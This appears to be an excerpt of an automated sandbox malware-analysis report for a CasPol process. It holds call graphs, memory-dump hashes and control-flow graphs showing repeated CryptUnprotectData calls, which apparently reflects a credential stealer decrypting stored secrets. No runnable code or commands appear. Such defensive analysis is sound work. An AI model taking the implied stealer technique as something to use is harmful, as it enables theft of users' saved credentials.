38454->38455 38455->38453 38455->38454 38458 2054f006 38456->38458 38459 2054f056 38456->38459 38457 2054f069 38457->38275 38458->38275 38459->38457 38460 2054d918 LdrInitializeThunk 38459->38460 38460->38459 38464 2054f244 38461->38464 38462 2054d918 LdrInitializeThunk 38462->38464 38463 2054f363 38464->38462 38464->38463 38466 2054d926 38465->38466 38468 2054d949 38465->38468 38466->38451 38467 2054d971 38467->38451 38468->38467 38469 2054daa3 LdrInitializeThunk 38468->38469 38470 2054dac0 38469->38470 38470->38451 38472 cac5c8 38471->38472 38479 cab738 38472->38479 38474 cac5f2 38474->38289 38476 cac5c8 38475->38476 38477 cab738 CryptUnprotectData 38476->38477 38478 cac5f2 38477->38478 38478->38289 38485 cab738 CryptUnprotectData 38479->38485 38493 cab9f0 38479->38493 38500 cab645 38479->38500 38507 cab714 38479->38507 38514 cab737 38479->38514 38529 cab7d6 38479->38529 38536 caba58 38479->38536 38480 caba2a 38480->38474 38481 cab738 CryptUnprotectData 38482 cabba3 38481->38482 38482->38474 38483 caba37 38483->38481 38483->38482 38484 cab758 38484->38480 38484->38483 38540 20546707 38484->38540 38485->38484 38498 cab791 38493->38498 38494 caba2a 38494->38484 38495 cab738 CryptUnprotectData 38496 cabba3 38495->38496 38496->38484 38497 caba37 38497->38495 38497->38496 38498->38494 38498->38497 38499 20546707 CryptUnprotectData 38498->38499 38499->38498 38501 cab63c 38500->38501 38501->38500 38502 cab6e7 38501->38502 38503 caba37 38501->38503 38506 20546707 CryptUnprotectData 38501->38506 38502->38484 38504 cabba3 38503->38504 38505 cab738 CryptUnprotectData 38503->38505 38504->38484 38505->38504 38506->38501 38512 cab71b 38507->38512 38508 caba2a 38508->38484 38509 cab738 CryptUnprotectData 38510 cabba3 38509->38510 38510->38484 38511 caba37 38511->38509 38511->38510 38512->38508 38512->38511 38513 20546707 CryptUnprotectData 38512->38513 38513->38512 38515 cab738 38514->38515 38521 cab738 CryptUnprotectData 38515->38521 38522 caba58 CryptUnprotectData 38515->38522 38523 cab9f0 CryptUnprotectData 38515->38523 38524 cab7d6 CryptUnprotectData 38515->38524 38525 cab737 CryptUnprotectData 38515->38525 38526 cab714 CryptUnprotectData 38515->38526 38527 cab645 CryptUnprotectData 38515->38527 38516 caba2a 38516->38484 38517 cab738 CryptUnprotectData 38518 cabba3 38517->38518 38518->38484 38519 caba37 38519->38517 38519->38518 38520 cab758 38520->38516 38520->38519 38528 20546707 CryptUnprotectData 38520->38528 38521->38520 38522->38520 38523->38520 38524->38520 38525->38520 38526->38520 38527->38520 38528->38520 38534 cab791 38529->38534 38530 caba2a 38530->38484 38531 cab738 CryptUnprotectData 38532 cabba3 38531->38532 38532->38484 38533 caba37 38533->38531 38533->38532 38534->38530 38534->38533 38535 20546707 CryptUnprotectData 38534->38535 38535->38534 38539 caba71 38536->38539 38537 cab738 CryptUnprotectData 38538 cabba3 38537->38538 38538->38484 38539->38537 38539->38538 38541 20546765 38540->38541 38542 2054671b 38540->38542 38541->38484 38542->38541 38545 20546d88 38542->38545 38554 20546d98 38542->38554 38546 20546dbd 38545->38546 38549 20546e71 38545->38549 38546->38549 38550 20546d98 CryptUnprotectData 38546->38550 38551 20546d88 CryptUnprotectData 38546->38551 38563 20546fe8 38546->38563 38567 20546f78 38546->38567 38571 20546ad8 38549->38571 38550->38549 38551->38549 38555 20546dbd 38554->38555 38558 20546e71 38554->38558 38555->38558 38559 20546d98 CryptUnprotectData 38555->38559 38560 20546d88 CryptUnprotectData 38555->38560 38561 20546f78 CryptUnprotectData 38555->38561 38562 20546fe8 CryptUnprotectData 38555->38562 38556 20546ad8 CryptUnprotectData 38557 2054703d 38556->38557 38557->38541 38558->38556 38559->38558 38560->38558 38561->38558 38562->38558 38564 20547005 38563->38564 38565 20546ad8 CryptUnprotectData 38564->38565 38566 2054703d 38565->38566 38566->38549 38568 20546f8d 38567->38568 38569 20546ad8 CryptUnprotectData 38568->38569 38570 2054703d 38569->38570 38570->38549 38572 20547228 CryptUnprotectData 38571->38572 38573 2054703d 38572->38573 38573->38541 38575 cabce1 38574->38575 38576 cab738 CryptUnprotectData 38575->38576 38577 cabd8e 38575->38577 38576->38577 38577->38341 38581 cabc26 38578->38581 38579 cab738 CryptUnprotectData 38580 cabc31 38579->38580 38580->38341 38581->38579 38581->38580 38582 da23e9 TerminateThread 38583 da2433 38582->38583 38584 2054da50 38585 2054da6f 38584->38585 38586 2054daa3 LdrInitializeThunk 38585->38586 38587 2054dac0 38586->38587
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fe5c9078a3127c7d6cb972fafb73c233ad2cd8e3283425930ab2687e1b2e90f4
                                                                                                                            • Instruction ID: b9b91322ae62a692b2f2f157177a152ab6cae57f9fc462f9e46b629f7e46644c
                                                                                                                            • Opcode Fuzzy Hash: fe5c9078a3127c7d6cb972fafb73c233ad2cd8e3283425930ab2687e1b2e90f4
                                                                                                                            • Instruction Fuzzy Hash: 14530D31D1071A8ECB11EF68C984699F7B1FF9A304F11D69AE45977221EB30AAC5CF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5737856473.0000000020540000.00000040.00000800.00020000.00000000.sdmp, Offset: 20540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_20540000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 7621d4b98d9cc45de68357e634fd0c83b43d404aec725b1912f6de9253a72f53
                                                                                                                            • Instruction ID: 8133df70046c98423027893b6c24c14f06aed4e10dda361c80169064c170b7b9
                                                                                                                            • Opcode Fuzzy Hash: 7621d4b98d9cc45de68357e634fd0c83b43d404aec725b1912f6de9253a72f53
                                                                                                                            • Instruction Fuzzy Hash: 6C51A575F042059BCB44EFF4C499ADEB7B6EF84204F118929E5129B391EF70E804CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 2054728D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5737856473.0000000020540000.00000040.00000800.00020000.00000000.sdmp, Offset: 20540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_20540000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 834300711-0
                                                                                                                            • Opcode ID: c3a4114b5bb564f48d9cc1444bc8960813cc81762717035c50a3428150b08b31
                                                                                                                            • Instruction ID: 90dccb15dd38888f7fedfd212c059145afbb3074942abfc6d6ee1f9d11404e5b
                                                                                                                            • Opcode Fuzzy Hash: c3a4114b5bb564f48d9cc1444bc8960813cc81762717035c50a3428150b08b31
                                                                                                                            • Instruction Fuzzy Hash: 88215976800249DFCB10CF99C845BEEBFF4EF48320F148419E654A7241C3759954CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 2054728D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5737856473.0000000020540000.00000040.00000800.00020000.00000000.sdmp, Offset: 20540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_20540000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 834300711-0
                                                                                                                            • Opcode ID: 260d47db5f75afe4e4929739db087edd3ed2edd7517b951cfe44afe803066cda
                                                                                                                            • Instruction ID: 9e5d05c2e127764cbc31f2df9d6caee838a01259ba0576dc186e3f86a47d5c76
                                                                                                                            • Opcode Fuzzy Hash: 260d47db5f75afe4e4929739db087edd3ed2edd7517b951cfe44afe803066cda
                                                                                                                            • Instruction Fuzzy Hash: E2115676804209DFCB10CF99D845BDEBFF4EF48320F108419EA54A7241C379A950DFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b90f69d9d6b62d3c25440d3d34c884b45cb33c64a29d4a3fe9e16ceafe53842
                                                                                                                            • Instruction ID: 3125987c1d6ae56d852671b06fd9766cc4e97749a24096c4bc610a92b346faf4
                                                                                                                            • Opcode Fuzzy Hash: 3b90f69d9d6b62d3c25440d3d34c884b45cb33c64a29d4a3fe9e16ceafe53842
                                                                                                                            • Instruction Fuzzy Hash: 00829E31A00256CFCB18CF68C994AAEBBF2FF89318F158559E455EB2A1C770EE41CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 54b01100bb33b0561ece836856ba90776f9c9f7631ff0a142cd02163e44aa02e
                                                                                                                            • Instruction ID: bd40e5231c32030e603d57a0654c66a2184f5f39ad6b1368bfb8fd2cea7087ef
                                                                                                                            • Opcode Fuzzy Hash: 54b01100bb33b0561ece836856ba90776f9c9f7631ff0a142cd02163e44aa02e
                                                                                                                            • Instruction Fuzzy Hash: 54728F71A001569FCB14CFA9C894AAEBBB2FF89348F158129E815DB361EB34DE41CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f3257715f55fafed83c5aa12b1cdad56d95bb43efef75ad2a9a09601efcb0693
                                                                                                                            • Instruction ID: 229e826940c5155c79792423e6e002f23d56b629e0249eee72a4e54592d49efb
                                                                                                                            • Opcode Fuzzy Hash: f3257715f55fafed83c5aa12b1cdad56d95bb43efef75ad2a9a09601efcb0693
                                                                                                                            • Instruction Fuzzy Hash: 2012E731F042158FDB24CB68C4547AEB7B2EF8A394F25807AD916EB391DB349D41CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8c60b7f00fdcc83ba3f3ba8e210fd36d86bc6091566bc6f79a0d8b4775014454
                                                                                                                            • Instruction ID: 318e67fb57e9264180f5d2e1ac5994b0c7b52e1b7f12303caccf41a16fa8d98c
                                                                                                                            • Opcode Fuzzy Hash: 8c60b7f00fdcc83ba3f3ba8e210fd36d86bc6091566bc6f79a0d8b4775014454
                                                                                                                            • Instruction Fuzzy Hash: 83A1F636B002228FCB18CFBDC484A69B7B2FF8A358B158069E525DB7A1DB35DD01CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e2150a43d1d724b4b56d75ba4ee42b93e6ed7e22710a6a11432215504665c28b
                                                                                                                            • Instruction ID: c6aa7e9be172cd956a5281a00eb7a91566b526dda2ad7f5a2ccbf82ceca09221
                                                                                                                            • Opcode Fuzzy Hash: e2150a43d1d724b4b56d75ba4ee42b93e6ed7e22710a6a11432215504665c28b
                                                                                                                            • Instruction Fuzzy Hash: 6BD012710053548FEB812B70DA8A7A43B34FB81346B0505A2E145C90A2EB600844DF33
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1070 1d51e478 1247 1d51e478 call cab738 1070->1247 1248 1d51e478 call caba58 1070->1248 1249 1d51e478 call cab9f0 1070->1249 1250 1d51e478 call cabcc0 1070->1250 1251 1d51e478 call cabc10 1070->1251 1252 1d51e478 call cab7d6 1070->1252 1253 1d51e478 call cab737 1070->1253 1254 1d51e478 call cab714 1070->1254 1255 1d51e478 call cab645 1070->1255 1071 1d51e47e-1d51e4bf 1263 1d51e4bf call cac598 1071->1263 1264 1d51e4bf call cac5a8 1071->1264 1074 1d51e4c5-1d51e506 1215 1d51e506 call 20548d90 1074->1215 1216 1d51e506 call 20548da0 1074->1216 1077 1d51e50c-1d51e54d 1227 1d51e54d call 20549800 1077->1227 1228 1d51e54d call 20549bd0 1077->1228 1229 1d51e54d call 20549c31 1077->1229 1080 1d51e553-1d51e594 1230 1d51e594 call 2054a340 1080->1230 1231 1d51e594 call 2054a330 1080->1231 1232 1d51e594 call 2054aa50 1080->1232 1233 1d51e594 call 2054aa43 1080->1233 1234 1d51e594 call 2054aafd 1080->1234 1235 1d51e594 call 2054aee8 1080->1235 1083 1d51e59a-1d51e6e5 call 2054c7c0 1244 1d51e6e5 call 2054d8a7 1083->1244 1245 1d51e6e5 call 2054d848 1083->1245 1246 1d51e6e5 call 2054d749 1083->1246 1098 1d51e6eb-1d51e80e KiUserExceptionDispatcher 1256 1d51e80e call 2054e3f0 1098->1256 1257 1d51e80e call 2054e2f1 1098->1257 1110 1d51e814-1d51e855 1258 1d51e855 call 2054e3f0 1110->1258 1259 1d51e855 call 2054e2f1 1110->1259 1260 1d51e855 call 2054e722 1110->1260 1261 1d51e855 call 2054e7b8 1110->1261 1262 1d51e855 call 2054e74a 1110->1262 1113 1d51e85b-1d51e893 1217 1d51e893 call 2054e3f0 1113->1217 1218 1d51e893 call 2054ec10 1113->1218 1219 1d51e893 call 2054e2f1 1113->1219 1220 1d51e893 call 2054e722 1113->1220 1221 1d51e893 call 2054ec6f 1113->1221 1222 1d51e893 call 2054e7b8 1113->1222 1223 1d51e893 call 2054eb69 1113->1223 1224 1d51e893 call 2054e74a 1113->1224 1116 1d51e899-1d51e8da 1225 1d51e8da call 2054ecd0 1116->1225 1226 1d51e8da call 2054ed30 1116->1226 1119 1d51e8e0-1d51e95f 1236 1d51e95f call 2054efe7 1119->1236 1237 1d51e95f call 2054ef88 1119->1237 1238 1d51e95f call 2054ef29 1119->1238 1125 1d51e965-1d51e9a6 1239 1d51e9a6 call 2054f395 1125->1239 1240 1d51e9a6 call 2054f341 1125->1240 1241 1d51e9a6 call 2054f048 1125->1241 1242 1d51e9a6 call 2054f0a8 1125->1242 1128 1d51e9ac-1d51f18e 1212 1d51f194-1d51f1e5 1128->1212 1215->1077 1216->1077 1217->1116 1218->1116 1219->1116 1220->1116 1221->1116 1222->1116 1223->1116 1224->1116 1225->1119 1226->1119 1227->1080 1228->1080 1229->1080 1230->1083 1231->1083 1232->1083 1233->1083 1234->1083 1235->1083 1236->1125 1237->1125 1238->1125 1239->1128 1240->1128 1241->1128 1242->1128 1244->1098 1245->1098 1246->1098 1247->1071 1248->1071 1249->1071 1250->1071 1251->1071 1252->1071 1253->1071 1254->1071 1255->1071 1256->1110 1257->1110 1258->1113 1259->1113 1260->1113 1261->1113 1262->1113 1263->1074 1264->1074
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: 51dce91603951c2e7d80f248954a04895be74ff7e682fb031985d856a713e56f
                                                                                                                            • Instruction ID: c116d729420d90f02dd00fdad542f350d18c64e2791bf66d89da19fd585085dd
                                                                                                                            • Opcode Fuzzy Hash: 51dce91603951c2e7d80f248954a04895be74ff7e682fb031985d856a713e56f
                                                                                                                            • Instruction Fuzzy Hash: 9502AA74941328CFCB69EF20C8986CAB771FF59715F5045EAD80A66354CB326E85CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1265 1d51e499-1d51e4bf 1412 1d51e4bf call cac598 1265->1412 1413 1d51e4bf call cac5a8 1265->1413 1269 1d51e4c5-1d51e506 1427 1d51e506 call 20548d90 1269->1427 1428 1d51e506 call 20548da0 1269->1428 1272 1d51e50c-1d51e54d 1429 1d51e54d call 20549800 1272->1429 1430 1d51e54d call 20549bd0 1272->1430 1431 1d51e54d call 20549c31 1272->1431 1275 1d51e553-1d51e594 1434 1d51e594 call 2054a340 1275->1434 1435 1d51e594 call 2054a330 1275->1435 1436 1d51e594 call 2054aa50 1275->1436 1437 1d51e594 call 2054aa43 1275->1437 1438 1d51e594 call 2054aafd 1275->1438 1439 1d51e594 call 2054aee8 1275->1439 1278 1d51e59a-1d51e6e5 call 2054c7c0 1448 1d51e6e5 call 2054d8a7 1278->1448 1449 1d51e6e5 call 2054d848 1278->1449 1450 1d51e6e5 call 2054d749 1278->1450 1293 1d51e6eb-1d51e80e KiUserExceptionDispatcher 1410 1d51e80e call 2054e3f0 1293->1410 1411 1d51e80e call 2054e2f1 1293->1411 1305 1d51e814-1d51e855 1414 1d51e855 call 2054e3f0 1305->1414 1415 1d51e855 call 2054e2f1 1305->1415 1416 1d51e855 call 2054e722 1305->1416 1417 1d51e855 call 2054e7b8 1305->1417 1418 1d51e855 call 2054e74a 1305->1418 1308 1d51e85b-1d51e893 1419 1d51e893 call 2054e3f0 1308->1419 1420 1d51e893 call 2054ec10 1308->1420 1421 1d51e893 call 2054e2f1 1308->1421 1422 1d51e893 call 2054e722 1308->1422 1423 1d51e893 call 2054ec6f 1308->1423 1424 1d51e893 call 2054e7b8 1308->1424 1425 1d51e893 call 2054eb69 1308->1425 1426 1d51e893 call 2054e74a 1308->1426 1311 1d51e899-1d51e8da 1432 1d51e8da call 2054ecd0 1311->1432 1433 1d51e8da call 2054ed30 1311->1433 1314 1d51e8e0-1d51e95f 1440 1d51e95f call 2054efe7 1314->1440 1441 1d51e95f call 2054ef88 1314->1441 1442 1d51e95f call 2054ef29 1314->1442 1320 1d51e965-1d51e9a6 1443 1d51e9a6 call 2054f395 1320->1443 1444 1d51e9a6 call 2054f341 1320->1444 1445 1d51e9a6 call 2054f048 1320->1445 1446 1d51e9a6 call 2054f0a8 1320->1446 1323 1d51e9ac-1d51f18e 1407 1d51f194-1d51f1e5 1323->1407 1410->1305 1411->1305 1412->1269 1413->1269 1414->1308 1415->1308 1416->1308 1417->1308 1418->1308 1419->1311 1420->1311 1421->1311 1422->1311 1423->1311 1424->1311 1425->1311 1426->1311 1427->1272 1428->1272 1429->1275 1430->1275 1431->1275 1432->1314 1433->1314 1434->1278 1435->1278 1436->1278 1437->1278 1438->1278 1439->1278 1440->1320 1441->1320 1442->1320 1443->1323 1444->1323 1445->1323 1446->1323 1448->1293 1449->1293 1450->1293
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: d019dfd40da14219d0a45047383eb48a50540a8dcb2a04b299a6583a025480ce
                                                                                                                            • Instruction ID: 79799bfb0a12445d82587eb027870df543d5a69ecb3e9dec9ba71d48af3d961e
                                                                                                                            • Opcode Fuzzy Hash: d019dfd40da14219d0a45047383eb48a50540a8dcb2a04b299a6583a025480ce
                                                                                                                            • Instruction Fuzzy Hash: A902B974941328CFCB69EF60C8986CAB771FF49715F5085EAD80A66354DB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1451 1d51e4e0-1d51e506 1619 1d51e506 call 20548d90 1451->1619 1620 1d51e506 call 20548da0 1451->1620 1455 1d51e50c-1d51e54d 1621 1d51e54d call 20549800 1455->1621 1622 1d51e54d call 20549bd0 1455->1622 1623 1d51e54d call 20549c31 1455->1623 1458 1d51e553-1d51e594 1626 1d51e594 call 2054a340 1458->1626 1627 1d51e594 call 2054a330 1458->1627 1628 1d51e594 call 2054aa50 1458->1628 1629 1d51e594 call 2054aa43 1458->1629 1630 1d51e594 call 2054aafd 1458->1630 1631 1d51e594 call 2054aee8 1458->1631 1461 1d51e59a-1d51e6e5 call 2054c7c0 1601 1d51e6e5 call 2054d8a7 1461->1601 1602 1d51e6e5 call 2054d848 1461->1602 1603 1d51e6e5 call 2054d749 1461->1603 1476 1d51e6eb-1d51e80e KiUserExceptionDispatcher 1604 1d51e80e call 2054e3f0 1476->1604 1605 1d51e80e call 2054e2f1 1476->1605 1488 1d51e814-1d51e855 1606 1d51e855 call 2054e3f0 1488->1606 1607 1d51e855 call 2054e2f1 1488->1607 1608 1d51e855 call 2054e722 1488->1608 1609 1d51e855 call 2054e7b8 1488->1609 1610 1d51e855 call 2054e74a 1488->1610 1491 1d51e85b-1d51e893 1611 1d51e893 call 2054e3f0 1491->1611 1612 1d51e893 call 2054ec10 1491->1612 1613 1d51e893 call 2054e2f1 1491->1613 1614 1d51e893 call 2054e722 1491->1614 1615 1d51e893 call 2054ec6f 1491->1615 1616 1d51e893 call 2054e7b8 1491->1616 1617 1d51e893 call 2054eb69 1491->1617 1618 1d51e893 call 2054e74a 1491->1618 1494 1d51e899-1d51e8da 1624 1d51e8da call 2054ecd0 1494->1624 1625 1d51e8da call 2054ed30 1494->1625 1497 1d51e8e0-1d51e95f 1593 1d51e95f call 2054efe7 1497->1593 1594 1d51e95f call 2054ef88 1497->1594 1595 1d51e95f call 2054ef29 1497->1595 1503 1d51e965-1d51e9a6 1596 1d51e9a6 call 2054f395 1503->1596 1597 1d51e9a6 call 2054f341 1503->1597 1598 1d51e9a6 call 2054f048 1503->1598 1599 1d51e9a6 call 2054f0a8 1503->1599 1506 1d51e9ac-1d51f18e 1590 1d51f194-1d51f1e5 1506->1590 1593->1503 1594->1503 1595->1503 1596->1506 1597->1506 1598->1506 1599->1506 1601->1476 1602->1476 1603->1476 1604->1488 1605->1488 1606->1491 1607->1491 1608->1491 1609->1491 1610->1491 1611->1494 1612->1494 1613->1494 1614->1494 1615->1494 1616->1494 1617->1494 1618->1494 1619->1455 1620->1455 1621->1458 1622->1458 1623->1458 1624->1497 1625->1497 1626->1461 1627->1461 1628->1461 1629->1461 1630->1461 1631->1461
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: eabb0ed66715b27a8f9c5facc261e100daeef51f33650ec42f4bad7013e32462
                                                                                                                            • Instruction ID: 232b6fbb1c70def61bf279413e0d992ede202ae9b75fee8206ae98b7aaca5842
                                                                                                                            • Opcode Fuzzy Hash: eabb0ed66715b27a8f9c5facc261e100daeef51f33650ec42f4bad7013e32462
                                                                                                                            • Instruction Fuzzy Hash: DA02B974941328CFCB69EF60C8986CAB7B1FF59715F5045EAD80A66354DB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1632 1d51e527-1d51e54d 1786 1d51e54d call 20549800 1632->1786 1787 1d51e54d call 20549bd0 1632->1787 1788 1d51e54d call 20549c31 1632->1788 1636 1d51e553-1d51e594 1791 1d51e594 call 2054a340 1636->1791 1792 1d51e594 call 2054a330 1636->1792 1793 1d51e594 call 2054aa50 1636->1793 1794 1d51e594 call 2054aa43 1636->1794 1795 1d51e594 call 2054aafd 1636->1795 1796 1d51e594 call 2054aee8 1636->1796 1639 1d51e59a-1d51e6e5 call 2054c7c0 1805 1d51e6e5 call 2054d8a7 1639->1805 1806 1d51e6e5 call 2054d848 1639->1806 1807 1d51e6e5 call 2054d749 1639->1807 1654 1d51e6eb-1d51e80e KiUserExceptionDispatcher 1771 1d51e80e call 2054e3f0 1654->1771 1772 1d51e80e call 2054e2f1 1654->1772 1666 1d51e814-1d51e855 1773 1d51e855 call 2054e3f0 1666->1773 1774 1d51e855 call 2054e2f1 1666->1774 1775 1d51e855 call 2054e722 1666->1775 1776 1d51e855 call 2054e7b8 1666->1776 1777 1d51e855 call 2054e74a 1666->1777 1669 1d51e85b-1d51e893 1778 1d51e893 call 2054e3f0 1669->1778 1779 1d51e893 call 2054ec10 1669->1779 1780 1d51e893 call 2054e2f1 1669->1780 1781 1d51e893 call 2054e722 1669->1781 1782 1d51e893 call 2054ec6f 1669->1782 1783 1d51e893 call 2054e7b8 1669->1783 1784 1d51e893 call 2054eb69 1669->1784 1785 1d51e893 call 2054e74a 1669->1785 1672 1d51e899-1d51e8da 1789 1d51e8da call 2054ecd0 1672->1789 1790 1d51e8da call 2054ed30 1672->1790 1675 1d51e8e0-1d51e95f 1797 1d51e95f call 2054efe7 1675->1797 1798 1d51e95f call 2054ef88 1675->1798 1799 1d51e95f call 2054ef29 1675->1799 1681 1d51e965-1d51e9a6 1800 1d51e9a6 call 2054f395 1681->1800 1801 1d51e9a6 call 2054f341 1681->1801 1802 1d51e9a6 call 2054f048 1681->1802 1803 1d51e9a6 call 2054f0a8 1681->1803 1684 1d51e9ac-1d51f18e 1768 1d51f194-1d51f1e5 1684->1768 1771->1666 1772->1666 1773->1669 1774->1669 1775->1669 1776->1669 1777->1669 1778->1672 1779->1672 1780->1672 1781->1672 1782->1672 1783->1672 1784->1672 1785->1672 1786->1636 1787->1636 1788->1636 1789->1675 1790->1675 1791->1639 1792->1639 1793->1639 1794->1639 1795->1639 1796->1639 1797->1681 1798->1681 1799->1681 1800->1684 1801->1684 1802->1684 1803->1684 1805->1654 1806->1654 1807->1654
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: 4b20bc83f6c3b2a6363a030ac6e24f2d3e5887d0788325299cb9809543dc6ea5
